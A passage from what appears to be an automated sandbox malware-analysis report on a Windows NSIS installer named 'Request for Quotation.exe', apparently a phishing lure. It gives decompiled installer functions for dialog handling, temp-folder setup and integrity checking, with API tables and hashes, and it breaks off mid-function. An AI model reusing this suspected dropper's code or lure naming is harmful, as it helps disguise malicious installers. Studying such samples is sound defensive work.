							E004062E0(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042D1(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042D1(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042D1(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4ec - _t134;
							_v32 = _t49;
							if( *0x42f4ec != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E004042F3(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429880, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4ec - _t134;
							if( *0x42f4ec == _t134) {
								_push( *0x42a8b4);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429880);
							}
							E00404306();
							E0040624D(0x42a8b8, E00403DDE());
							E004062E0(0x42a8b8, _t126, _t131,  &(0x42a8b8[lstrlenA(0x42a8b8)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a8b8);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ec18);
									 *0x42a090 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f440,  *_t131 +  *0x42ec20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ec18 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042D1(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ec18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ec0c - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ec18, 8);
									E0040431D(0x405);
									goto L58;
								}
								__eflags =  *0x42f4ec - _t134;
								if( *0x42f4ec != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4e0 - _t134;
								if( *0x42f4e0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ec18);
						 *0x42f448 = _t134;
						EndDialog(_t126,  *0x429c88);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ec18, 0x40f, 0, 1);
						__eflags =  *0x42ec0c - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a898, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a898,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E00404338(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ec18, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4ec - _t134;
										if( *0x42f4ec == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c88 = 1;
											L21:
											_push(0x78);
											L22:
											E004042AA();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c88 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ec18);
						 *0x42ec18 = _a12;
						L58:
						if( *0x42b8b8 == _t134) {
							_t143 =  *0x42ec18 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b8b8 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                                                                0x00403e06
                                                                                0x00403e0f
                                                                                0x00403f50
                                                                                0x00403f54
                                                                                0x00403f58
                                                                                0x00403f5a
                                                                                0x00403f5f
                                                                                0x00403f6a
                                                                                0x00403f75
                                                                                0x00403f7a
                                                                                0x00403f7c
                                                                                0x00403f7e
                                                                                0x00403f81
                                                                                0x00403f86
                                                                                0x00403f94
                                                                                0x00403fa1
                                                                                0x00403fa8
                                                                                0x00403fa8
                                                                                0x00403fa9
                                                                                0x00403fa9
                                                                                0x00403fae
                                                                                0x00403fb4
                                                                                0x00403fbb
                                                                                0x00403fc1
                                                                                0x00403fc3
                                                                                0x00404003
                                                                                0x00404008
                                                                                0x0040400d
                                                                                0x0040400d
                                                                                0x00404012
                                                                                0x0040401b
                                                                                0x0040401d
                                                                                0x00404022
                                                                                0x00404028
                                                                                0x0040402c
                                                                                0x0040402c
                                                                                0x00404031
                                                                                0x00404037
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404042
                                                                                0x00404048
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404051
                                                                                0x00404059
                                                                                0x0040405e
                                                                                0x00404061
                                                                                0x00404067
                                                                                0x0040406c
                                                                                0x0040406f
                                                                                0x00404075
                                                                                0x0040407a
                                                                                0x0040407d
                                                                                0x00404083
                                                                                0x0040408b
                                                                                0x00404091
                                                                                0x00404097
                                                                                0x0040409b
                                                                                0x004040a2
                                                                                0x004040a2
                                                                                0x004040a2
                                                                                0x004040ac
                                                                                0x004040be
                                                                                0x004040ca
                                                                                0x004040cf
                                                                                0x004040d9
                                                                                0x004040df
                                                                                0x004040e1
                                                                                0x004040e6
                                                                                0x004040e3
                                                                                0x004040e3
                                                                                0x004040e3
                                                                                0x004040f6
                                                                                0x0040410e
                                                                                0x00404110
                                                                                0x00404116
                                                                                0x0040412b
                                                                                0x00404118
                                                                                0x00404121
                                                                                0x00404123
                                                                                0x00404123
                                                                                0x00404131
                                                                                0x00404142
                                                                                0x00404153
                                                                                0x0040415a
                                                                                0x00404160
                                                                                0x00404164
                                                                                0x00404169
                                                                                0x0040416b
                                                                                0x00000000
                                                                                0x00404171
                                                                                0x00404171
                                                                                0x00404173
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404179
                                                                                0x0040417d
                                                                                0x004041a2
                                                                                0x004041a8
                                                                                0x004041ae
                                                                                0x004041b0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004041d6
                                                                                0x004041dc
                                                                                0x004041de
                                                                                0x004041e3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004041e9
                                                                                0x004041ec
                                                                                0x004041ef
                                                                                0x00404206
                                                                                0x00404212
                                                                                0x0040422b
                                                                                0x00404231
                                                                                0x00404235
                                                                                0x0040423a
                                                                                0x00404240
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040424a
                                                                                0x00404255
                                                                                0x00000000
                                                                                0x00404255
                                                                                0x0040417f
                                                                                0x00404185
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040418b
                                                                                0x00404191
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404197
                                                                                0x0040416b
                                                                                0x00404262
                                                                                0x0040426e
                                                                                0x00404275
                                                                                0x00000000
                                                                                0x00403fc5
                                                                                0x00403fc5
                                                                                0x00403fc8
                                                                                0x00403ffb
                                                                                0x00403ffb
                                                                                0x00403ffd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403ffd
                                                                                0x00403fca
                                                                                0x00403fce
                                                                                0x00403fd3
                                                                                0x00403fd5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403fe5
                                                                                0x00403fed
                                                                                0x00000000
                                                                                0x00403ff3
                                                                                0x00403e21
                                                                                0x00403e21
                                                                                0x00403e25
                                                                                0x00403e2a
                                                                                0x00403e39
                                                                                0x00403e39
                                                                                0x00403e42
                                                                                0x00403e4b
                                                                                0x00403e56
                                                                                0x00403e56
                                                                                0x00403e62
                                                                                0x00403e7e
                                                                                0x00403e81
                                                                                0x00403e94
                                                                                0x00403e9a
                                                                                0x00403f3d
                                                                                0x00000000
                                                                                0x00403f46
                                                                                0x00403ea0
                                                                                0x00403ead
                                                                                0x00403eaf
                                                                                0x00403eb1
                                                                                0x00403ed0
                                                                                0x00403ed0
                                                                                0x00403ed3
                                                                                0x00403ed8
                                                                                0x00403edb
                                                                                0x00403eeb
                                                                                0x00403eec
                                                                                0x00403eee
                                                                                0x00403f24
                                                                                0x00403f37
                                                                                0x00000000
                                                                                0x00403f37
                                                                                0x00403ef0
                                                                                0x00403ef6
                                                                                0x00403f0f
                                                                                0x00403f14
                                                                                0x00403f16
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403f18
                                                                                0x00403f04
                                                                                0x00403f04
                                                                                0x00403f06
                                                                                0x00403f06
                                                                                0x00000000
                                                                                0x00403f06
                                                                                0x00403ef9
                                                                                0x00403efe
                                                                                0x00000000
                                                                                0x00403efe
                                                                                0x00403edd
                                                                                0x00403ee3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403ee5
                                                                                0x00000000
                                                                                0x00403ee5
                                                                                0x00403ed5
                                                                                0x00000000
                                                                                0x00403ed5
                                                                                0x00403ebb
                                                                                0x00403ec2
                                                                                0x00403ec8
                                                                                0x00403eca
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403eca
                                                                                0x00403e86
                                                                                0x00000000
                                                                                0x00403e64
                                                                                0x00403e6a
                                                                                0x00403e74
                                                                                0x0040427b
                                                                                0x00404281
                                                                                0x00404283
                                                                                0x00404289
                                                                                0x0040428e
                                                                                0x00404294
                                                                                0x00404294
                                                                                0x00404289
                                                                                0x0040429e
                                                                                0x00000000
                                                                                0x0040429e
                                                                                0x00403e62

                                                                                APIs
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E39
                                                                                • ShowWindow.USER32(?), ref: 00403E56
                                                                                • DestroyWindow.USER32 ref: 00403E6A
                                                                                • SetWindowLongA.USER32 ref: 00403E86
                                                                                • GetDlgItem.USER32 ref: 00403EA7
                                                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBB
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403EC2
                                                                                • GetDlgItem.USER32 ref: 00403F70
                                                                                • GetDlgItem.USER32 ref: 00403F7A
                                                                                • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403F94
                                                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403FE5
                                                                                • GetDlgItem.USER32 ref: 0040408B
                                                                                • ShowWindow.USER32(00000000,?), ref: 004040AC
                                                                                • EnableWindow.USER32(?,?), ref: 004040BE
                                                                                • EnableWindow.USER32(?,?), ref: 004040D9
                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040EF
                                                                                • EnableMenuItem.USER32 ref: 004040F6
                                                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040410E
                                                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00404121
                                                                                • lstrlenA.KERNEL32(0042A8B8,?,0042A8B8,00000000), ref: 0040414B
                                                                                • SetWindowTextA.USER32(?,0042A8B8), ref: 0040415A
                                                                                • ShowWindow.USER32(?,0000000A), ref: 0040428E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                                                • String ID:
                                                                                • API String ID: 4050669955-0
                                                                                • Opcode ID: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                                                • Instruction ID: d5b7a152eccfdaa35e4c53a1a76e60acfbe2d5449824965e5503988bb7e30882
                                                                                • Opcode Fuzzy Hash: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                                                • Instruction Fuzzy Hash: 34C1E671604204ABDB216F62EE85E2B3BB8FB85349F40053EF641B51F0CB795892DB2D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403A60, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E00403A60(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f454;
				_t17 = E00406656(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a8b8;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00406134(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a8b8, 0);
					__eflags =  *0x42a8b8;
					if(__eflags == 0) {
						E00406134(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a8b8, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E004061AB("1033",  *_t17() & 0x0000ffff);
				}
				E00403D25(_t71, _t84);
				_t80 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x42f4e0 =  *0x42f45c & 0x00000020;
				 *0x42f4fc = 0x10000;
				if(E00405CD3(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405CD3(_t92, _t80) == 0) {
						E004062E0(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f440, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42ec28 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D25(_t71, __eflags);
							__eflags =  *0x42f500;
							if( *0x42f500 != 0) {
								_t28 = E00405446(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ec0c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a898, 5); // executed
							_t34 = E004065E8("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E004065E8("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebe0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebe0);
								 *0x42ec04 = _t81;
								RegisterClassA(0x42ebe0);
							}
							_t36 =  *0x42ec20; // 0x0
							_t39 = DialogBoxParamA( *0x42f440, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DFD, 0); // executed
							E004039B0(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f440;
						 *0x42ebe4 = E00401000;
						 *0x42ebf0 =  *0x42f440;
						 *0x42ebf4 = _t25;
						 *0x42ec04 = 0x40a210;
						if(RegisterClassA(0x42ebe0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a898 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f440, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3e0;
					E00406134(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f498, 0x42e3e0, 0);
					_t57 =  *0x42e3e0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3e1;
						 *((char*)(E00405C10(0x42e3e1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E0040624D(_t80, E00405BE5(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C2C(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                0x00403a66
                                                                                0x00403a6f
                                                                                0x00403a76
                                                                                0x00403a78
                                                                                0x00403a8c
                                                                                0x00403a9e
                                                                                0x00403aa5
                                                                                0x00403aac
                                                                                0x00403ab2
                                                                                0x00403ab7
                                                                                0x00403abd
                                                                                0x00403ad0
                                                                                0x00403ad0
                                                                                0x00403adb
                                                                                0x00403a7a
                                                                                0x00403a85
                                                                                0x00403a85
                                                                                0x00403ae0
                                                                                0x00403aea
                                                                                0x00403af3
                                                                                0x00403af8
                                                                                0x00403b09
                                                                                0x00403b90
                                                                                0x00403b98
                                                                                0x00403ba1
                                                                                0x00403ba1
                                                                                0x00403bb7
                                                                                0x00403bbd
                                                                                0x00403bcb
                                                                                0x00403c4c
                                                                                0x00403c54
                                                                                0x00403c5e
                                                                                0x00403c63
                                                                                0x00403c69
                                                                                0x00403cf3
                                                                                0x00403cf8
                                                                                0x00403cfa
                                                                                0x00403d16
                                                                                0x00000000
                                                                                0x00403d16
                                                                                0x00403cfc
                                                                                0x00403d02
                                                                                0x00403d0a
                                                                                0x00403d0a
                                                                                0x00000000
                                                                                0x00403d02
                                                                                0x00403c77
                                                                                0x00403c82
                                                                                0x00403c87
                                                                                0x00403c89
                                                                                0x00403c90
                                                                                0x00403c90
                                                                                0x00403c9b
                                                                                0x00403ca3
                                                                                0x00403ca5
                                                                                0x00403ca7
                                                                                0x00403cb0
                                                                                0x00403cb3
                                                                                0x00403cb9
                                                                                0x00403cb9
                                                                                0x00403cbf
                                                                                0x00403cd8
                                                                                0x00403ce9
                                                                                0x00000000
                                                                                0x00403cee
                                                                                0x00403c56
                                                                                0x00403c58
                                                                                0x00000000
                                                                                0x00403bcd
                                                                                0x00403bcd
                                                                                0x00403bd9
                                                                                0x00403be3
                                                                                0x00403be9
                                                                                0x00403bee
                                                                                0x00403bfd
                                                                                0x00403d1b
                                                                                0x00403d1b
                                                                                0x00000000
                                                                                0x00403d1b
                                                                                0x00403c0c
                                                                                0x00403c47
                                                                                0x00000000
                                                                                0x00403c47
                                                                                0x00403b0f
                                                                                0x00403b0f
                                                                                0x00403b12
                                                                                0x00403b14
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403b1e
                                                                                0x00403b2e
                                                                                0x00403b33
                                                                                0x00403b3a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403b3e
                                                                                0x00403b40
                                                                                0x00403b4d
                                                                                0x00403b4d
                                                                                0x00403b55
                                                                                0x00403b5b
                                                                                0x00403b83
                                                                                0x00403b8b
                                                                                0x00000000
                                                                                0x00403b6d
                                                                                0x00403b6e
                                                                                0x00403b77
                                                                                0x00403b7d
                                                                                0x00403b7e
                                                                                0x00000000
                                                                                0x00403b7e
                                                                                0x00403b79
                                                                                0x00403b7b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403b7b
                                                                                0x00403b5b

                                                                                APIs
                                                                                  • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                  • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                                • lstrcatA.KERNEL32(1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Request for Quotation.exe" ,00000000), ref: 00403ADB
                                                                                • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,73BCFA90), ref: 00403B50
                                                                                • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                                                • GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
                                                                                • LoadImageA.USER32 ref: 00403BB7
                                                                                  • Part of subcall function 004061AB: wsprintfA.USER32 ref: 004061B8
                                                                                • RegisterClassA.USER32 ref: 00403BF4
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C0C
                                                                                • CreateWindowExA.USER32 ref: 00403C41
                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403C77
                                                                                • GetClassInfoA.USER32 ref: 00403CA3
                                                                                • GetClassInfoA.USER32 ref: 00403CB0
                                                                                • RegisterClassA.USER32 ref: 00403CB9
                                                                                • DialogBoxParamA.USER32 ref: 00403CD8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: "C:\Users\user\Desktop\Request for Quotation.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$B
                                                                                • API String ID: 1975747703-2889978477
                                                                                • Opcode ID: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
                                                                                • Instruction ID: 8734c0f5f73e26911640e72846d54346a9337973c4420bd4a4a6803de24d7ebf
                                                                                • Opcode Fuzzy Hash: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
                                                                                • Instruction Fuzzy Hash: 1B61C6702042007EE620BF669D46F373AACDB4474DF94443FF945B62E2CA7DA9068A2D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 208memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E00402EF1(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				intOrPtr _t100;
				void* _t104;
				intOrPtr _t105;
				long _t106;
				long _t109;
				intOrPtr* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x42f450 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\Request for Quotation.exe", 0x400);
				_t104 = E00405DE6("C:\\Users\\jones\\Desktop\\Request for Quotation.exe", 0x80000000, 3);
				 *0x40a018 = _t104;
				if(_t104 == 0xffffffff) {
					return "Error launching installer";
				}
				E0040624D("C:\\Users\\jones\\Desktop", "C:\\Users\\jones\\Desktop\\Request for Quotation.exe");
				E0040624D(0x437000, E00405C2C("C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t104, 0);
				 *0x429470 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402E52(1);
					if( *0x42f458 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t110 = GlobalAlloc(0x40, _v20);
						_t105 = 8;
						 *0x415458 = 0x40d450;
						 *0x415454 = 0x40d450;
						 *0x40b8b0 = _t105;
						 *0x40bdcc = 0;
						 *0x40bdc8 = 0;
						 *0x415450 = 0x415450; // executed
						E00405E15( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E0040343E( *0x42f458 + 0x1c);
							 *0x429474 = _t65;
							 *0x429468 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E004031B7(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x42f454 = _t110;
								 *0x42f45c =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x42f460 =  *0x42f460 + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t100 = _t105;
								do {
									_t70 = _t70 - _t105;
									 *_t70 =  *_t70 + _t110;
									_t100 = _t100 - 1;
								} while (_t100 != 0);
								 *((intOrPtr*)(_t110 + 0x3c)) =  *0x429464;
								E00405DA1(0x42f480, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E0040343E( *0x429460);
					if(E00403428( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42f458) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						if(E00403428(0x421460, _t106) == 0) {
							E00402E52(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42f458 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402E52(0);
							}
							goto L19;
						}
						E00405DA1( &_v40, 0x421460, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42f500 =  *0x42f500 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42f458 =  *0x429460;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
